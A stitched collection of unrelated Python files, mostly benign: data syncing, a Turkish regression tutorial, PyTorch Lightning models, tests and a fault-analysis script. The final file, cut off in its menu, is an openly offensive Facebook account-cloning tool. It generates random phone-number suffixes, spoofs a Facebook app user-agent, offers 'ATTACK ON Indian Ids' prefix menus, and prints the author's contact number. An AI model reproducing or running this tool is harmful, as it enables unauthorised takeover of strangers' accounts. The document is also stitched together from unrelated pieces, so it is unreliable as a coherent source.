return max(1, current_user_max_id), self.dataSyncer.requestHandler.max_id
def run(self):
max_db_id, max_api_id = self.calculate_incremental_scraping_range()
if max_db_id < max_api_id:
logger.info(
'Current max user id:%s in database is smaller than max id:%s in API, starting syncing data from'
' %s to %s', max_db_id, max_api_id, max_db_id, max_api_id)
self.dataSyncer.start_scraper(max_db_id, max_api_id + 1)
else:
logger.info(
'Nothing to sync as there\'s no new user. Current max id in API :%s, max id in database: :%s',
max_api_id, max_db_id)
if __name__ == "__main__":
userPartialSyncer = UserPartialSyncer()
userPartialSyncer.run()
| python |
import sys
import ui
if __name__ == "__main__":
app = ui.QtWidgets.QApplication(sys.argv)
MainWindow = ui.QtWidgets.QMainWindow()
ui = ui.Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_()) | python |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
dataset = pd.read_csv("student_scores.csv")
# verisetinin boyutları
dataShape = dataset.shape
print(dataShape)
print(dataset.head(7)) # datasetin başını gösterir. default değer 5'tir.
print(dataset.tail(7)) # datasetin sonunu gösterir. default değer 5'tir.
# Veriseti hakkında ön bilgi için describe() kullanılabilir.
print(dataset.describe())
print(dataset.columns) # verisetindeki kolonların isimlerini verir.
X = dataset.iloc[:, :-1].values #Hours değerleri
y = dataset.iloc[:, 1].values #Scores değerleri
print(X)
print(y)
# Verisetini eğitim ve test olarak parçalar
# test_size=0.2 => verisetinin %80'i eğitim %20'si test için ayrılmasını sağlar
# random_state => fonksiyon her çalışmasında veriyi farklı bir sırayla çekmesinin önüne geçer
# Böylece eğitim her zaman aynı sırayla yapılmış olur.
from sklearn.model_selection import train_test_split
Xtrain, Xtest, ytrain, ytest = train_test_split(X, y, test_size=0.2, random_state=0)
# Regresyon modelinin eklenmesi
from sklearn.linear_model import LinearRegression
reg = LinearRegression() # regresyon nesnesi tanımalama
reg.fit(Xtrain,ytrain) # hazırlanan veriler modele verilir ve eğitime başlanır.
print(reg.intercept_) # Çıkan sonucun yaklaşık 2.01816004143 değerde olması gerekiyor.
# x değişkenini bir birim artmasıyla y'de olan değişiklik
print(reg.coef_) # bu örnek için öğrenci bir saat fazla çalışarak çıkan sonuç kadar yüksek skor elde edebilir.
### Tahmin Yapma
yPred = reg.predict(Xtest) ## Xtest değerlerine göre yapılan tahminler
print(yPred)
# yapılan tahminlerin gerçek verilerle kıyaslanabilmesi için dataframe haline getirilir.
df = pd.DataFrame({"Gerçek Değer": ytest, "Tahmin Edilen değer": yPred})
print(df)
## Performans Değerlendirmesi
from sklearn import metrics
# Mean Absolute Error (MAE) (Ortalama Mutlak Hata) metriğine göre puanı
# Mutlak hata, tahmin edilen değerler ile gerçek değerler arasındaki farktır.
# gerçek değer ile tahmin arasındaki farkın mutlak değeridir.
maeScore = metrics.mean_absolute_error(ytest, yPred)
print("Ortalama Mutlak Hata = " + str(maeScore))
# Mean Squared Error (MSE) (Ortalama Kare Hatası) metriğine göre sonucu
# MSE her değer için gerçek değer ile tahmin arasındaki farkın kareleri toplamının
# aritmetik ortalamasıdır.
mseScore = metrics.mean_squared_error(ytest, yPred)
print("Ortalama Kare Hatası = " + str(mseScore))
# Root Mean Squared Error (RMSE) metriğine göre sonucu
rmseScore = np.sqrt(metrics.mean_squared_error(ytest, yPred))
print("RMSE = "+ str(rmseScore))
# Veri görselleştirme
dataset.plot(x="Hours", y="Scores", style="go")
random_x = [1.1, 5.01, 9.2]
plt.plot(random_x,
reg.intercept_ + reg.coef_ * random_x,
color='red',
label='regresyon grafiği')
plt.title("Saatlere Göre Yüzdelik Skorlar")
plt.xlabel("Çalışma Saatleri")
plt.ylabel("Yüzdelik Skorlar")
plt.savefig("Grafik.jpg")
plt.show()
## Veri seti dışındaki veriler ile yapılan tahminler
testVeri = np.array([0.5, 1.0, 4.2, 6.7, 10.0]).reshape(-1,1)
pred = reg.predict(testVeri)
for i in range(len(testVeri)):
print(str(testVeri[i]) + "=>" + str(pred[i]) ) | python |
import os, sys
variables_size = 3
dataset_name = "Epilepsy"
class_dictionary = {}
class_count = 1
dirname = os.path.abspath(os.path.dirname(sys.argv[0]))
train_test_str = ["_TRAIN","_TEST"]
for i in range(0,2):
arff_data_flag = 0
series_count = 1
file_location = dirname + "/" + dataset_name + train_test_str[i] + ".arff"
with open(file_location) as fin:
newfile_name = dataset_name + train_test_str[i] + "_FORMATED"
with open(newfile_name, "w") as newfile:
for line in fin:
if arff_data_flag == 0:
if line == "@data\n": #check for start of dataset values
arff_data_flag = 1
continue
line = line.split(",")
attribute_iterator = 0
class_value = None
ts_helper = []
for j in range(0,variables_size):
ts_helper.append([])
for j in range(0,len(line)):
if "\\n" in line[j]:
splitted_lines = line[j].split("\\n")
ts_helper[attribute_iterator].append(float(splitted_lines[0]))
attribute_iterator = attribute_iterator + 1
ts_helper[attribute_iterator].append(float(splitted_lines[1]))
elif j == (len(line)-1):
if line[j] in class_dictionary:
class_value = class_dictionary[line[j]]
else:
class_dictionary[line[j]] = class_count
class_value = class_count
class_count = class_count + 1
elif "'" in line[j]:
formated_value = line[j].replace("'","")
ts_helper[attribute_iterator].append(float(formated_value))
elif '"' in line[j]:
formated_value = line[j].replace('"',"")
ts_helper[attribute_iterator].append(float(formated_value))
else:
ts_helper[attribute_iterator].append(float(line[j]))
for j in range(0,len(ts_helper[0])):
line_to_write = ""
line_to_write += str(series_count) + " " + str(j+1) + " " + str(class_value)
for u in range(0,variables_size):
line_to_write += " " + str(ts_helper[u][j])
line_to_write += "\n"
newfile.write(line_to_write)
series_count = series_count + 1
| python |
from .AlgerianMobilePhoneNumber import AlgerianMobilePhoneNumber | python |
from automl_infrastructure.experiment.observations import SimpleObservation
import numpy as np
class Std(SimpleObservation):
"""
Implementation of standard deviation scores aggregation.
"""
def __init__(self, metric):
super().__init__(metric)
def agg_func(self, values):
return np.std(values)
class Avg(SimpleObservation):
"""
Implementation of mean scores aggregation.
"""
def __init__(self, metric):
super().__init__(metric)
def agg_func(self, values):
return np.mean(values)
| python |
import torch
import torchvision.transforms as T
from pytorch_grad_cam import GradCAMPlusPlus
from pytorch_lightning import LightningModule
from pawpularity.augmentations import mixup
from . import efficientnet, levit_transformer, swin_transformers, vision_transformers, learnable_resizer
class Model(LightningModule):
supported_models = {
'EfficientNetV2Large': efficientnet.__dict__['EfficientNetV2Large'],
'EfficientNetV2Medium': efficientnet.__dict__['EfficientNetV2Medium'],
'EfficientNetV2Small': efficientnet.__dict__['EfficientNetV2Small'],
'EfficientNetB0': efficientnet.__dict__['EfficientNetB0'],
'EfficientNetB1': efficientnet.__dict__['EfficientNetB1'],
'EfficientNetB2': efficientnet.__dict__['EfficientNetB2'],
'EfficientNetB3': efficientnet.__dict__['EfficientNetB3'],
'EfficientNetB4': efficientnet.__dict__['EfficientNetB4'],
'EfficientNetB5': efficientnet.__dict__['EfficientNetB5'],
'Levit': levit_transformer.__dict__['Levit'],
'SwinLarge': swin_transformers.__dict__['SwinLarge'],
'SwinLargev2': swin_transformers.__dict__['SwinLargev2'],
'SwinSmall': swin_transformers.__dict__['SwinSmall'],
'SwinTiny': swin_transformers.__dict__['SwinTiny'],
'ViTTiny': vision_transformers.__dict__['ViTTiny'],
'ViTTinyv2': vision_transformers.__dict__['ViTTinyv2'],
'ViTSmall': vision_transformers.__dict__['ViTSmall'],
'ViTSmallv2': vision_transformers.__dict__['ViTSmallv2'],
'ViTLarge': vision_transformers.__dict__['ViTLarge'],
'ViTLargev2': vision_transformers.__dict__['ViTLargev2'],
'ViTHybridTiny': vision_transformers.__dict__['ViTHybridTiny'],
'ViTHybridTinyv2': vision_transformers.__dict__['ViTHybridTinyv2'],
'ViTHybridSmall': vision_transformers.__dict__['ViTHybridSmall'],
'ViTHybridSmallv2': vision_transformers.__dict__['ViTHybridSmallv2'],
'ViTHybridLarge': vision_transformers.__dict__['ViTHybridLarge'],
'ViTHybridLargev2': vision_transformers.__dict__['ViTHybridLargev2'],
}
supported_loss = {
'BCEWithLogitsLoss': torch.nn.BCEWithLogitsLoss
}
supported_optimizers = {
'Adam': torch.optim.Adam,
'AdamW': torch.optim.AdamW
}
supported_schedulers = {
'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
}
def __init__(self,
cfg):
super().__init__()
self.cfg = cfg
self._build_model()
self._build_criterion()
self.save_hyperparameters(self.cfg.asdict)
def _build_model(self):
if self.cfg.model_name not in self.supported_models:
raise ValueError(
f"{self.cfg.model_name} not supported, check your configuration")
self.model = self.supported_models[self.cfg.model_name](self.cfg)
def _build_criterion(self):
if self.cfg.loss not in self.supported_loss:
raise ValueError(
f"{self.cfg.loss} not supported, check your configuration")
self.criterion = self.supported_loss[self.cfg.loss]()
def _build_optimizer(self):
if self.cfg.optimizer['name'] not in self.supported_optimizers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
self.parameters(), **self.cfg.optimizer['params'])
def _build_scheduler(self):
if self.cfg.scheduler['name'] not in self.supported_schedulers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
self.optimizer, **self.cfg.scheduler['params'])
def forward(self, x):
out = self.model(x)
return out
def training_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'train')
return {'loss': loss, 'pred': pred, 'labels': labels}
def validation_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'val')
return {'loss': loss, 'pred': pred, 'labels': labels}
def predict_step(self, batch, batch_idx, dataloader_idx=0):
images, _ = batch
logits, embeddings = self.model(images, True)
pred = logits.squeeze(1).sigmoid().detach().cpu().numpy() * 100.
embeddings = embeddings.detach().cpu().numpy()
return {'pred': pred, 'embeddings': embeddings}
def _share_step(self, batch, mode):
images, labels = batch
labels = labels.float() / 100.0
if torch.rand(1)[0] < 0.5 and mode == 'train':
mix_images, target_a, target_b, lam = mixup(
images, labels, alpha=0.5)
logits = self.forward(mix_images).squeeze(1)
loss = self.criterion(logits, target_a) * lam + \
(1 - lam) * self.criterion(logits, target_b)
else:
logits = self.forward(images).squeeze(1)
loss = self.criterion(logits, labels)
pred = logits.sigmoid().detach().cpu() * 100.
labels = labels.detach().cpu() * 100.
return loss, pred, labels
def training_epoch_end(self, outputs):
self._share_epoch_end(outputs, 'train')
def validation_epoch_end(self, outputs):
self._share_epoch_end(outputs, 'val')
def _share_epoch_end(self, outputs, mode):
preds = []
labels = []
for out in outputs:
pred, label = out['pred'], out['labels']
preds.append(pred)
labels.append(label)
preds = torch.cat(preds)
labels = torch.cat(labels)
metrics = torch.sqrt(((labels - preds) ** 2).mean())
self.log(f'{mode}_loss', metrics)
def check_gradcam(self, dataloader, target_layer, target_category, reshape_transform=None):
inv_normalize = T.Normalize(mean=[-m/s for m, s in zip(self.cfg.image_mean, self.cfg.image_std)],
std=[1/s for s in self.cfg.image_std])
cam = GradCAMPlusPlus(
model=self,
target_layer=target_layer,
use_cuda=self.cfg.trainer['gpus'],
reshape_transform=reshape_transform)
org_images, labels = iter(dataloader).next()
cam.batch_size = len(org_images)
images = org_images.to(self.device)
logits = self.forward(images).squeeze(1)
pred = logits.sigmoid().detach().cpu().numpy() * 100
labels = labels.cpu().numpy()
grayscale_cam = cam(input_tensor=images,
target_category=target_category, eigen_smooth=True)
org_images = inv_normalize(images)
org_images = org_images.detach().cpu().numpy().transpose(0, 2, 3, 1)
return org_images, grayscale_cam, pred, labels
def configure_optimizers(self):
self._build_optimizer()
self._build_scheduler()
return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
class ResizerModel(LightningModule):
supported_models = {
'Resizer': learnable_resizer.__dict__['Resizer']
}
supported_loss = {
'CrossEntropyLoss': torch.nn.CrossEntropyLoss,
'MSE': torch.nn.MSELoss
}
supported_optimizers = {
'Adam': torch.optim.Adam,
'AdamW': torch.optim.AdamW
}
supported_schedulers = {
'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
}
def __init__(self,
cfg):
super().__init__()
self.cfg = cfg
self._build_model()
self._build_criterion()
def _build_model(self):
if self.cfg.model_name not in self.supported_models:
raise ValueError(
f"{self.cfg.model_name} not supported, check your configuration")
self.model = self.supported_models[self.cfg.model_name](self.cfg)
def _build_criterion(self):
if self.cfg.loss not in self.supported_loss:
raise ValueError(
f"{self.cfg.loss} not supported, check your configuration")
self.criterion = self.supported_loss[self.cfg.loss]()
def _build_optimizer(self):
if self.cfg.optimizer['name'] not in self.supported_optimizers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
self.parameters(), **self.cfg.optimizer['params'])
def _build_scheduler(self):
if self.cfg.scheduler['name'] not in self.supported_schedulers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
self.optimizer, **self.cfg.scheduler['params'])
def forward(self, x):
out = self.model(x)
return out
def training_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'train')
return {'loss': loss, 'pred': pred, 'labels': labels}
def validation_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'val')
return {'loss': loss, 'pred': pred, 'labels': labels}
def _share_step(self, batch, mode):
x, y = batch
y_hat = self.model(x)
loss = self.criterion(y_hat, y)
y_hat = y_hat.detach().cpu()
y = y.detach().cpu()
return loss, y_hat, y
def _share_epoch_end(self, outputs, mode):
preds = []
labels = []
for out in outputs:
pred, label = out['pred'], out['labels']
preds.append(pred)
labels.append(label)
preds = torch.cat(preds)
labels = torch.cat(labels)
metrics = ((labels - preds) ** 2).mean()
self.log(f'{mode}_loss', metrics)
def training_epoch_end(self, training_step_outputs):
self._share_epoch_end(training_step_outputs, 'train')
def validation_epoch_end(self, validation_step_outputs):
self._share_epoch_end(validation_step_outputs, 'val')
def configure_optimizers(self):
self._build_optimizer()
self._build_scheduler()
return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
| python |
# Generated by Django 3.1.5 on 2021-04-29 10:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webpage', '0014_auto_20210428_0912'),
]
operations = [
migrations.AddField(
model_name='notification',
name='read',
field=models.BooleanField(default=False),
),
]
| python |
from __future__ import print_function
# Time: O(n)
# Space: O(1)
#
# Given a roman numeral, convert it to an integer.
#
# Input is guaranteed to be within the xrange from 1 to 3999.
#
class Solution:
# @return an integer
def romanToInt(self, s):
numeral_map = {"I": 1, "V": 5, "X": 10, "L": 50, "C":100, "D": 500, "M": 1000}
decimal = 0
for i in xrange(len(s)):
if i > 0 and numeral_map[s[i]] > numeral_map[s[i - 1]]:
decimal += numeral_map[s[i]] - 2 * numeral_map[s[i - 1]]
else:
decimal += numeral_map[s[i]]
return decimal
if __name__ == "__main__":
print(Solution().romanToInt("IIVX"))
print(Solution().romanToInt("MMMCMXCIX"))
| python |
from mat_mult.mcm import memoized_mcm
def test_memo(test_cases):
for test in test_cases:
dims = test['dims']
best_cost = memoized_mcm(dims=dims)[0]
assert best_cost == test['cost']
| python |
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import json
from django.core.management.base import BaseCommand, CommandError
from starthinker_ui.recipe.views import autoscale
from starthinker_ui.recipe.models import Recipe, utc_milliseconds, JOB_LOOKBACK_MS
class Command(BaseCommand):
help = 'Autoscale workers.'
def handle(self, *args, **kwargs):
print(json.dumps(json.loads(autoscale(None).content), indent=2))
for recipe in Recipe.objects.filter(active=True, job_utm__lt=utc_milliseconds()).exclude(job_utm=0):
print(recipe.id, recipe.name, recipe.get_days())
print('---')
for recipe in Recipe.objects.filter(active=True, worker_utm__gte=utc_milliseconds() - JOB_LOOKBACK_MS):
print(recipe.id, recipe.name, recipe.worker_uid)
| python |
import torch
from change_detection_pytorch.encoders import get_encoder
if __name__ == '__main__':
sample = torch.randn(1, 3, 256, 256)
model = get_encoder('mit-b0', img_size=256)
res = model(sample)
for x in res:
print(x.size())
| python |
# -*- Mode: Python -*-
#
# This file calls PARC_FAME_Toolkit and determine possible fault modes
# that exists in CyPhy Driveline Model.
import sys, os, traceback, json, shutil
from collections import OrderedDict
import fetch
script_dir = os.path.dirname(os.path.realpath(__file__))
output_dir = os.path.abspath(os.path.join(script_dir,"../"))
cyphy_model_dir = os.path.abspath(os.path.join(script_dir,"../CyPhy"))
# function to put the result into json format
def output(faultCount,output_dir):
# creating ordered dictionary to be outputted in testbench.json format
data = OrderedDict()
data["$id"] = "1"
data["Name"] = "FAME_Possible_Faults"
MetricDict = OrderedDict()
MetricDict["$id"] = "2"
#setting arbitruary number as default requirement value
MetricDict["Requirement"] = "1000"
MetricDict["Name"] = "Possible_Faults"
MetricDict["Unit"] = "count"
MetricDict["Value"] = faultCount
data["Metric"] = [MetricDict]
with open(os.path.join(script_dir,'FAME_Possible_Faults.testbench.json'),'w') as outfile:
json.dump(data,outfile, indent=2,sort_keys=False)
# quick bug fix for space in modelica folder name
# this is stripping the version number from Modelica library (if version is separated by space).
def set_library_dir():
library_dir = os.path.join(script_dir,'../Libraries/')
if os.path.exists(library_dir):
for foldername in os.listdir(library_dir):
try:
if foldername.split(" ")>1:
os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
except WindowsError:
shutil.rmtree(os.path.join(library_dir,foldername.split()[0]))
os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
else:
outfile = open("_FAILED.txt","w")
outfile.write("Missing Modelica Library which should be in ../Libraries\n")
outfile.close()
sys.exit()
return library_dir
def get_fame_toolbox_modelica_libraries():
flag = 1
# check if any critical library is missing
if (os.path.isdir(os.path.join(script_dir,"FAME")) and
os.path.isdir(os.path.join(script_dir,"MSL")) and
os.path.isdir(os.path.join(script_dir,"pre-faulted"))):
flag = 0
if flag == 1:
# going redownload whole set of key libraries
if os.path.exists(os.path.join(script_dir,"FAME")):
shutil.rmtree(os.path.join(script_dir,"FAME"))
if os.path.exists(os.path.join(script_dir,"MSL")):
shutil.rmtree(os.path.join(script_dir,"MSL"))
if os.path.exists(os.path.join(script_dir,"pre-faulted")):
shutil.rmtree(os.path.join(script_dir,"pre-faulted"))
fetch.fetch_and_unpack_zip_file("http://fame-deploy.parc.com/C2M2L_Decl/fault-enabled-libraries/FAME_Toolkit_Modelica_Files.zip", script_dir)
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","FAME"),
os.path.join(script_dir,"FAME"))
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","MSL"),
os.path.join(script_dir,"MSL"))
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","pre-faulted"),
os.path.join(script_dir,"pre-faulted"))
shutil.rmtree(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files"))
def get_testbench_name():
model_raw_data = open(os.path.join(cyphy_model_dir,"model_config.json"))
model_json = json.load(model_raw_data)
return model_json["model_name"]
try:
import PARC_FAME_Toolkit
library_dir = set_library_dir()
# finding testbench name from json file that CyPhy created.
testbench_name = get_testbench_name()
# finding all the necessary model library to run testbench
"""
# This approach failed because Postprocessing folder, which is not Modelica package
# was in CyPhy folder.
model_libraries = [cyphy_model_dir]
for directory in os.listdir(cyphy_model_dir):
if os.path.isdir(os.path.join(cyphy_model_dir,directory)):
model_libraries.append(os.path.abspath(os.path.join(cyphy_model_dir,directory)))
"""
model_libraries = [os.path.abspath(os.path.join(script_dir,"../CyPhy/"))]
for directory in os.listdir(library_dir):
if os.path.isdir(os.path.join(library_dir,directory)):
model_libraries.append(os.path.abspath(os.path.join(library_dir,directory)))
print model_libraries
get_fame_toolbox_modelica_libraries()
results = PARC_FAME_Toolkit.fault_analyze_testbench(
testbench_name, model_libraries)
except:
sys.stderr.write("Can't list faults:\n%s\n" % traceback.format_exc())
# more complicated error handling can be added here, if desired
else:
# now render it as JSON
with open(os.path.join(script_dir,'possibleFault.json'),'w') as outfile:
jsondata = json.dumps(results, indent=4)
outfile.write(jsondata)
faultCnt = 0
for i in range(len(results)):
try:
faultCnt = faultCnt + len(results[i]["modes"])
except:
pass
output(faultCnt,output_dir)
if faultCnt > 0:
keyfilename = "testbench_manifest.json"
keyfile = os.path.join(output_dir,keyfilename)
with open(keyfile,"r") as infile:
jsondata = json.load(infile, object_pairs_hook=OrderedDict)
for i in range(len(jsondata["Metrics"])):
if jsondata["Metrics"][i]["Name"] == "NumPossFaults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
if jsondata["Metrics"][i]["Name"] == "NumPossibleFaults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
if jsondata["Metrics"][i]["Name"] == "Number_Faults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
with open(keyfile,"w") as outfile:
json.dump(jsondata,outfile, indent=4)
| python |
import logging
from openpyxl import load_workbook, Workbook
from openpyxl.utils.exceptions import InvalidFileException
class XLSXWorkbook:
def __init__(self, filename: str):
self.filename = filename
@property
def filename(self):
return self.__filename
@filename.setter
def filename(self, filename: str, discard: bool = False):
if not discard: # save modified content back to the excel if needed
try:
if self.__workbook is not None and self.__dirty:
self.__workbook.save(self.filename)
except AttributeError:
pass
# open the new excel
try:
self.__workbook = load_workbook(filename)
except InvalidFileException as e:
logging.error(f'Failed to open excel file {filename}: {e}')
self.__workbook = None
else:
self.__filename = filename
finally:
self.__dirty = False
@property
def sheet_names(self) -> list:
if self.__workbook is not None:
return self.__workbook.sheetnames
return None
if __name__ == '__main__':
workbook = XLSXWorkbook('../../../../dataset/bentre/So Lieu Man Ben Tre 2018.xlsx')
print(workbook.sheet_names)
| python |
from __future__ import annotations
from unittest import TestCase
from tests.classes.simple_book import SimpleBook
from tests.classes.simple_deadline import SimpleDeadline
class TestUpdate(TestCase):
def test_update_without_arguments_wont_change_anything(self):
book = SimpleBook(name='Thao Bvê', published=False)
book.update()
self.assertEqual(book._data_dict,
{'name': 'Thao Bvê', 'published': False})
def test_update_with_keyed_arguments_updates_value(self):
book = SimpleBook(name='Thao Bvê', published=False)
book.update(name='Thao Boê')
self.assertEqual(book._data_dict,
{'name': 'Thao Boê', 'published': False})
def test_update_set_multiple_values_at_once(self):
book = SimpleBook(name='Thao Boê', published=False)
book.update(name='Thao Bɛ', published=True)
self.assertEqual(book._data_dict,
{'name': 'Thao Bɛ', 'published': True})
def test_update_returns_self_and_is_chained(self):
book = SimpleBook(name='Thao Boê', published=False)
book.update(name='C').update(name='P') \
.update(name='T').update(name='B')
self.assertEqual(book._data_dict, {'published': False, 'name': 'B'})
def test_update_does_not_trigger_transform(self):
deadline = SimpleDeadline()
deadline.update(ended_at='2020-02-04')
self.assertEqual(deadline._data_dict,
{'ended_at': '2020-02-04', 'message': None})
def test_update_sets_back_value_to_none(self):
deadline = SimpleDeadline()
deadline.update(ended_at='2020-02-04').update(ended_at=None)
self.assertEqual(
deadline._data_dict,
{'ended_at': None, 'message': None})
def test_update_does_not_auto_convert_camelcase_keys_into_snakecase(self):
deadline = SimpleDeadline()
with self.assertRaises(ValueError):
deadline.update(**{'endedAt': '2020-02-04'})
def test_update_raises_if_given_key_is_not_allowed(self):
deadline = SimpleDeadline()
with self.assertRaises(ValueError) as context:
deadline.update(**{'name': 'a', 'value': 'b'})
self.assertRegex(str(context.exception),
"'(name|value)', '(value|name)' not allowed in "
"SimpleDeadline\\.")
| python |
#CYBER NAME BLACK-KILLER
#GITHUB: https://github.com/ShuBhamg0sain
#WHATAPP NO +919557777030
import os
CorrectUsername = "g0sain"
CorrectPassword = "sim"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[#] \x1b[0;36m Enter Username\x1b[1;92m➤ ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[#] \x1b[0;36m Enter Password\x1b[1;92m➤ ")
if (password == CorrectPassword):
print "Logged in successfully as " + username #fb-cloning-id SG
loop = 'false'
else:
print "Wrong password!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
else:
print "Wrong username!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### Dev : ShuBhamg0sain#####
##### LOGO #####
logo='''
\033[1;96m•◈•───────────────•◈•\033[1;92mShuBhamg0sain\033[1;96m•◈•───────────────•◈•
\033[1;97m
\033[1;97m :::!~!!!!!:.
\033[1;97m .xUHWH!! !!?M88WHX:.
\033[1;97m .X*#M@$!! !X!M$$$$$$WWx:.
\033[1;97m :!!!!!!?H! :!$!$$$$$$$$$$8X:
\033[1;97m !!~ ~:~!! :~!$!#$$$$$$$$$$8X:
\033[1;97m :!~::!H!< ~.U$X!?R$$$$$$$$MM!
\033[1;91m ~!~!!!! .: BLACK-KILLER$$$$RMM!
\033[1;97m !:~~~ .:!M"T#$$$$WX??#MRRMMM!
\033[1;97m ~?WuxiW*` `"#$$$$8!!!!??!!!
\033[1;97m :X- M$$$$ `"T#$T~!8$WUXU~
\033[1;97m :%` ~#$$$m: ~!~ ?$$$$$$
\033[1;97m :!`.- ~T$$$$8xx. .xWW- ~""##*"
\033[1;97m..... -~~\033[1;91m:<` ! ~?T#$$@@W@*?$$ /`
\033[1;97mW$@@M!!! .!~~ \033[1;91m!! .:XUW$W!~ `"~: :
\033[1;97m#"~~`.:x%`!! \033[1;91m!H: !WM$$$$Ti.: .!WUn+!`
\033[1;97m:::~:!!`:X~ .:\033[1;92m ?H.!u "$$$B$$$!W:U!T$$M~
\033[1;97m.~~ :X@!.-~ \033[1;92m?@WTWo("*$$$W$TH$! `
\033[1;97mWi.~!X$?!-~ : \033[1;92m?$$$B$Wu("**$RM!
\033[1;97m$R@i.~~ ! : \033[1;92m~$$$$$B$$en:``
\033[1;97m?MXT@Wx.~ : \033[1;92m~"##*$$$$M~
\033[1;47m \033[1;31mShuBhamg0sain \033[1;0m
\x1b[1;93m--------------------------------------------------------------
\x1b[1;92m➣ NAME : Shubhamg0sain
\x1b[1;91m➣ CYBER NAME : BLACK-KILLER
\x1b[1;93m➣ WHATSAPP NO : +919557777030
\x1b[1;95m➣ WARNING : DON,T CALL ME ONLY TEXT
\x1b[1;97m➣ NOTE : USE FAST 4G SIM NET
\x1b[1;93m--------------------------------------------------------------"""
'''
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print "\033[1;92mCYBER_HACKER_GLAXY_R.H.P_1.286-Wellcome"
print
print "\033[1;91mATTACK ON Indian Ids"
print "\033[1;92m[1] starter 919"
print "\033[1;92m[2] starter 918 "
print "\033[1;92m[3] starter 917"
print "\033[1;92m[4] my whatapp group"
print "\033[1;92m[5] my instagram id"
print "\033[1;92m[6] UPDATE SYSTEM"
print "\033[1;92m[0] FOR EXIT"
print 50*'-'
action()
def action():
bch = raw_input('\n ENTER HERE ANY NUMBER ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;95m560, 650, 717, 810, 871, 818, 871, 910, 958, 971, 540, 718, 891, 911, 990, 716"
print "\033[1;95m582, 654, 711, 811, 873, 899, 953, 999, 015, 310, 311, 312, 313, 350, 555"
try:
c = raw_input(" SELECTED CODE: ")
k="+919"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m130, 527, 800, 826, 506, 510, 512, 743, 744, 745, 750, 595, 882, 285, 802"
print "\033[1;95m375, 376, 377, 447, 586, 587, 588, 860, 010, 287, 467, 468, 470, 471"
try:
c = raw_input(" SELECTED CODE: ")
k="+918"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
